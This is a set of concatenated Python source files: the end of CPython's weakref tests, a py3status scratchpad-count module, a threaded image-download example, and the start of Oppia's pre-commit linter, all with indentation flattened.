for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_valued_union_operators(self):
a = C()
b = C()
c = C()
wvd1 = weakref.WeakValueDictionary({1: a})
wvd2 = weakref.WeakValueDictionary({1: b, 2: a})
wvd3 = wvd1.copy()
d1 = {1: c, 3: b}
pairs = [(5, c), (6, b)]
tmp1 = wvd1 | wvd2 # Between two WeakValueDictionaries
self.assertEqual(dict(tmp1), dict(wvd1) | dict(wvd2))
self.assertIs(type(tmp1), weakref.WeakValueDictionary)
wvd1 |= wvd2
self.assertEqual(wvd1, tmp1)
tmp2 = wvd2 | d1 # Between WeakValueDictionary and mapping
self.assertEqual(dict(tmp2), dict(wvd2) | d1)
self.assertIs(type(tmp2), weakref.WeakValueDictionary)
wvd2 |= d1
self.assertEqual(wvd2, tmp2)
tmp3 = wvd3.copy() # Between WeakValueDictionary and iterable key, value
tmp3 |= pairs
self.assertEqual(dict(tmp3), dict(wvd3) | dict(pairs))
self.assertIs(type(tmp3), weakref.WeakValueDictionary)
tmp4 = d1 | wvd3 # Testing .__ror__
self.assertEqual(dict(tmp4), d1 | dict(wvd3))
self.assertIs(type(tmp4), weakref.WeakValueDictionary)
del a
self.assertNotIn(2, tmp1)
self.assertNotIn(2, tmp2)
self.assertNotIn(1, tmp3)
self.assertNotIn(1, tmp4)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_keyed_union_operators(self):
o1 = C()
o2 = C()
o3 = C()
wkd1 = weakref.WeakKeyDictionary({o1: 1, o2: 2})
wkd2 = weakref.WeakKeyDictionary({o3: 3, o1: 4})
wkd3 = wkd1.copy()
d1 = {o2: '5', o3: '6'}
pairs = [(o2, 7), (o3, 8)]
tmp1 = wkd1 | wkd2 # Between two WeakKeyDictionaries
self.assertEqual(dict(tmp1), dict(wkd1) | dict(wkd2))
self.assertIs(type(tmp1), weakref.WeakKeyDictionary)
wkd1 |= wkd2
self.assertEqual(wkd1, tmp1)
tmp2 = wkd2 | d1 # Between WeakKeyDictionary and mapping
self.assertEqual(dict(tmp2), dict(wkd2) | d1)
self.assertIs(type(tmp2), weakref.WeakKeyDictionary)
wkd2 |= d1
self.assertEqual(wkd2, tmp2)
tmp3 = wkd3.copy() # Between WeakKeyDictionary and iterable key, value
tmp3 |= pairs
self.assertEqual(dict(tmp3), dict(wkd3) | dict(pairs))
self.assertIs(type(tmp3), weakref.WeakKeyDictionary)
tmp4 = d1 | wkd3 # Testing .__ror__
self.assertEqual(dict(tmp4), d1 | dict(wkd3))
self.assertIs(type(tmp4), weakref.WeakKeyDictionary)
del o1
self.assertNotIn(4, tmp1.values())
self.assertNotIn(4, tmp2.values())
self.assertNotIn(1, tmp3.values())
self.assertNotIn(1, tmp4.values())
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
@support.cpython_only
def test_remove_closure(self):
d = weakref.WeakValueDictionary()
self.assertIsNone(d._remove.__closure__)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
with self.assertRaises(TypeError):
weakref.finalize(a, func=fin, arg=1)
with self.assertRaises(TypeError):
weakref.finalize(obj=a, func=fin, arg=1)
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
scratchpad.py
|
"""
Display number of scratchpad windows and urgency hints.
Configuration parameters:
cache_timeout: refresh interval for i3-msg or swaymsg (default 5)
format: display format for this module
(default "\u232b [\\?color=scratchpad {scratchpad}]")
thresholds: specify color thresholds to use
(default [(0, "darkgray"), (1, "violet")])
Format placeholders:
{scratchpad} number of scratchpads
{urgent} number of urgent scratchpads
Color thresholds:
xxx: print a color based on the value of `xxx` placeholder
Optional:
i3ipc: an improved python library to control i3wm and sway
Examples:
```
# hide zero scratchpad
scratchpad {
format = '[\\?not_zero \u232b [\\?color=scratchpad {scratchpad}]]'
}
# hide non-urgent scratchpad
scratchpad {
format = '[\\?not_zero \u232b {urgent}]'
}
# bring up scratchpads on clicks
scratchpad {
on_click 1 = 'scratchpad show'
}
# add more colors
scratchpad {
thresholds = [
(0, "darkgray"), (1, "violet"), (2, "deepskyblue"), (3, "lime"),
(4, "yellow"), (5, "orange"), (6, "red"), (7, "tomato"),
]
}
```
@author shadowprince (counter), cornerman (async)
@license Eclipse Public License (counter), BSD (async)
SAMPLE OUTPUT
[{'full_text': '\u232b '}, {'full_text': u'0', 'color': '#a9a9a9'}]
violet
[{'full_text': '\u232b '}, {'full_text': u'5', 'color': '#ee82ee'}]
urgent
[{'full_text': '\u232b URGENT 1', 'urgent': True}]
"""
STRING_ERROR = "invalid ipc `{}`"
class Ipc:
"""
"""
def __init__(self, parent):
self.parent = parent
self.setup(parent)
class I3ipc(Ipc):
"""
i3ipc - an improved python library to control i3wm and sway
"""
def setup(self, parent):
from threading import Thread
self.parent.cache_timeout = self.parent.py3.CACHE_FOREVER
self.scratchpad_data = {"scratchpad": 0, "urgent": 0}
t = Thread(target=self.start)
t.daemon = True
t.start()
def start(self):
from i3ipc import Connection
i3 = Connection()
self.update(i3)
for event in ["window::move", "window::urgent"]:
i3.on(event, self.update)
i3.main()
def update(self, i3, event=None):
scratchpad = i3.get_tree().scratchpad()
if not scratchpad:
return
# Workaround for I3ipc 2.2.1 not finding leaves() in sway. Fixing: #2038
leaves = getattr(scratchpad, "floating_nodes", [])
temporary = {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum(window.urgent for window in leaves),
}
if self.scratchpad_data != temporary:
self.scratchpad_data = temporary
self.parent.py3.update()
def get_scratchpad_data(self):
return self.scratchpad_data
class Msg(Ipc):
"""
i3-msg - send messages to i3 window manager
swaymsg - send messages to sway window manager
"""
def setup(self, parent):
from json import loads
self.json_loads = loads
wm_msg = {"i3msg": "i3-msg"}.get(parent.ipc, parent.ipc)
self.tree_command = [wm_msg, "-t", "get_tree"]
def get_scratchpad_data(self):
tree = self.json_loads(self.parent.py3.command_output(self.tree_command))
leaves = self.find_scratchpad(tree).get("floating_nodes", [])
return {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum(window["urgent"] for window in leaves),
}
def find_scratchpad(self, tree):
if tree.get("name") == "__i3_scratch":
return tree
for x in tree.get("nodes", []):
result = self.find_scratchpad(x)
if result:
return result
return {}
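# Illustrative sketch (not part of the module): for a minimal get_tree payload
# such as
#     {"name": "root", "nodes": [
#         {"name": "__i3_scratch", "floating_nodes": [{"urgent": False}]}]}
# find_scratchpad() returns the "__i3_scratch" node, so the counts derived
# from its floating_nodes would be one scratchpad window and no urgent ones.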
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 5
format = "\u232b [\\?color=scratchpad {scratchpad}]"
thresholds = [(0, "darkgray"), (1, "violet")]
def post_config_hook(self):
# ipc: specify i3ipc, i3-msg, or swaymsg, otherwise auto
self.ipc = getattr(self, "ipc", "")
if self.ipc in ["", "i3ipc"]:
try:
from i3ipc import Connection # noqa f401
self.ipc = "i3ipc"
except Exception:
if self.ipc:
raise # module not found
self.ipc = (self.ipc or self.py3.get_wm_msg()).replace("-", "")
if self.ipc in ["i3ipc"]:
self.backend = I3ipc(self)
elif self.ipc in ["i3msg", "swaymsg"]:
self.backend = Msg(self)
else:
raise Exception(STRING_ERROR.format(self.ipc))
self.thresholds_init = self.py3.get_color_names_list(self.format)
def scratchpad(self):
scratchpad_data = self.backend.get_scratchpad_data()
for x in self.thresholds_init:
if x in scratchpad_data:
self.py3.threshold_get_color(scratchpad_data[x], x)
response = {
"cached_until": self.py3.time_in(self.cache_timeout),
"full_text": self.py3.safe_format(self.format, scratchpad_data),
}
if scratchpad_data["urgent"]:
response["urgent"] = True
return response
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
config = {"format": r"\[{ipc}\] [\?color=scratchpad {scratchpad}]"}
module_test(Py3status, config=config)
|
threaded_download.py
|
# Sequential download
import time
import urllib.request
def downloadImage(imagePath, fileName):
print("downloading image from ", imagePath)
urllib.request.urlretrieve(imagePath, fileName)
print("Completed Download")
def main_sequential():
t0 = time.time()
for i in range(10):
imageName = "temp/image-" + str(i) + ".jpg"
# generate an imageName which includes the temp/ directory, a string representation of what
# iteration we are currently at--str(i)--and the file extension .jpg
downloadImage("http://lorempixel.com/400/200/sports", imageName) #gives us a random image
t1 = time.time()
totalTime = t1 - t0
print("main_sequential total execution time {}".format(totalTime))
# Concurrent download
import threading
import urllib.request
import time
def executeThread(i):
imageName = "temp/image-" + str(i) + ".jpg"
downloadImage("http://lorempixel.com/400/200/sports/", imageName)
def main_threaded():
t0 = time.time()
#create an array which will store a reference to all our threads
threads = []
# create 10 threads, append them to our array of threads and start them off
for i in range(10):
thread = threading.Thread(target=executeThread, args=(i, ))
threads.append(thread)
thread.start()
# ensure that all the threads in our array have completed their execution
# before we log the total time to complete
for i in threads:
i.join()
# calculate the total execution time
t1 = time.time()
totalTime = t1 - t0
print("main_threaded total execution time {}".format(totalTime))
if __name__ == '__main__':
# main_sequential()
main_threaded()
|
pre_commit_linter.py
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pre-commit script for Oppia.
This script lints Python and JavaScript code, and prints a
list of lint errors to the terminal. If the directory path is passed,
it will lint all Python and JavaScript files in that directory; otherwise,
it will only lint files that have been touched in this commit.
This script ignores all filepaths contained within .eslintignore.
=====================
CUSTOMIZATION OPTIONS
=====================
1. To lint only files that have been touched in this commit
python -m scripts.pre_commit_linter
2. To lint all files in the folder or to lint just a specific file
python -m scripts.pre_commit_linter --path filepath
3. To lint a specific list of files (*.js/*.py only). Separate files by spaces
python -m scripts.pre_commit_linter --files file_1 file_2 ... file_n
4. To lint files in verbose mode
python -m scripts.pre_commit_linter --verbose
Note that the root folder MUST be named 'oppia'.
"""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
# Pylint has issues with the import order of argparse.
# pylint: disable=wrong-import-order
import abc
import argparse
import ast
import collections
import contextlib
import fnmatch
import glob
import multiprocessing
import os
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import time
# Install third party dependencies before proceeding.
from . import install_third_party_libs
install_third_party_libs.main(args=[])
# pylint: disable=wrong-import-position
import python_utils # isort:skip
_PARSER = argparse.ArgumentParser()
_EXCLUSIVE_GROUP = _PARSER.add_mutually_exclusive_group()
_EXCLUSIVE_GROUP.add_argument(
'--path',
help='path to the directory with files to be linted',
action='store')
_EXCLUSIVE_GROUP.add_argument(
'--files',
nargs='+',
help='specific files to be linted. Space separated list',
action='store')
_PARSER.add_argument(
'--verbose',
help='verbose mode. All details will be printed.',
action='store_true')
EXCLUDED_PHRASES = [
'utf', 'pylint:', 'http://', 'https://', 'scripts/', 'extract_node']
EXCLUDED_PATHS = (
'third_party/*', 'build/*', '.git/*', '*.pyc', 'CHANGELOG',
'integrations/*', 'integrations_dev/*', '*.svg', '*.gif',
'*.png', '*.zip', '*.ico', '*.jpg', '*.min.js', 'backend_prod_files/*',
'assets/scripts/*', 'core/tests/data/*', 'core/tests/build_sources/*',
'*.mp3', '*.mp4', 'node_modules/*', 'typings/*', 'local_compiled_js/*',
'webpack_bundles/*', 'core/tests/services_sources/*',
'core/tests/release_sources/tmp_unzip.zip',
'core/tests/release_sources/tmp_unzip.tar.gz')
GENERATED_FILE_PATHS = (
'extensions/interactions/LogicProof/static/js/generatedDefaultData.ts',
'extensions/interactions/LogicProof/static/js/generatedParser.ts',
'core/templates/dev/head/expressions/expression-parser.service.js')
CONFIG_FILE_PATHS = (
'core/tests/.browserstack.env.example',
'core/tests/protractor.conf.js',
'core/tests/karma.conf.ts',
'core/templates/dev/head/mathjaxConfig.ts',
'assets/constants.ts',
'assets/rich_text_components_definitions.ts',
'webpack.config.ts',
'webpack.dev.config.ts',
'webpack.prod.config.ts')
BAD_PATTERNS = {
'__author__': {
'message': 'Please remove author tags from this file.',
'excluded_files': (),
'excluded_dirs': ()},
'datetime.datetime.now()': {
'message': 'Please use datetime.datetime.utcnow() instead of '
'datetime.datetime.now().',
'excluded_files': (),
'excluded_dirs': ()},
'\t': {
'message': 'Please use spaces instead of tabs.',
'excluded_files': (),
'excluded_dirs': (
'assets/i18n/', 'core/tests/build_sources/assets/')},
'\r': {
'message': 'Please make sure all files only have LF endings (no CRLF).',
'excluded_files': (),
'excluded_dirs': ()},
'<<<<<<<': {
'message': 'Please fully resolve existing merge conflicts.',
'excluded_files': (),
'excluded_dirs': ()},
'>>>>>>>': {
'message': 'Please fully resolve existing merge conflicts.',
'excluded_files': (),
'excluded_dirs': ()},
'glyphicon': {
'message': 'Please use equivalent material-icons '
'instead of glyphicons.',
'excluded_files': (),
'excluded_dirs': ()}
}
BAD_PATTERNS_REGEXP = [
{
'regexp': re.compile(r'TODO[^\(]*[^\)][^:]*[^\w]*$'),
'message': 'Please assign TODO comments to a user '
'in the format TODO(username): XXX. ',
'excluded_files': (),
'excluded_dirs': ()
}
]
BAD_PATTERNS_JS_AND_TS_REGEXP = [
{
'regexp': re.compile(r'\b(browser.explore)\('),
'message': 'In tests, please do not use browser.explore().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(browser.pause)\('),
'message': 'In tests, please do not use browser.pause().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(browser.sleep)\('),
'message': 'In tests, please do not use browser.sleep().',
'excluded_files': (
# TODO(#7622): Remove the file from the excluded list. Remove the
# TODO in core/tests/protractor_desktop/embedding.js pointing to the
# same issue. The following was placed due to a necessary sleep as
# a temporary measure to keep the embedding tests from failing.
'core/tests/protractor_desktop/embedding.js'
),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(browser.waitForAngular)\('),
'message': 'In tests, please do not use browser.waitForAngular().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(ddescribe|fdescribe)\('),
'message': 'In tests, please use \'describe\' instead of \'ddescribe\' '
'or \'fdescribe\'',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(iit|fit)\('),
'message': 'In tests, please use \'it\' instead of \'iit\' or \'fit\'',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(beforeEach\(inject\(function)\('),
'message': 'In tests, please use \'angular.mock.inject\' instead of '
'\'inject\'',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'templateUrl: \''),
'message': 'The directives must be directly referenced.',
'excluded_files': (
'core/templates/dev/head/pages/exploration-player-page/'
'FeedbackPopupDirective.js'
),
'excluded_dirs': (
'extensions/answer_summarizers/',
'extensions/classifiers/',
'extensions/dependencies/',
'extensions/value_generators/',
'extensions/visualizations/')
},
{
'regexp': re.compile(r'\$parent'),
'message': 'Please do not access parent properties ' +
'using $parent. Use the scope object ' +
'for this purpose.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'require\(.*\.\..*\);'),
'message': 'Please, don\'t use relative imports in require().',
'excluded_files': (),
'excluded_dirs': ('core/tests/',)
}
]
MANDATORY_PATTERNS_REGEXP = [
{
'regexp': re.compile(
r'Copyright \d{4} The Oppia Authors\. All Rights Reserved\.'),
'message': 'Please ensure this file contains a proper '
'copyright notice.',
'included_types': ('.py', '.js', '.sh', '.ts'),
'excluded_files': GENERATED_FILE_PATHS + CONFIG_FILE_PATHS + (
'__init__.py', ),
'excluded_dirs': EXCLUDED_PATHS
},
{
'regexp': re.compile('from __future__ import unicode_literals'),
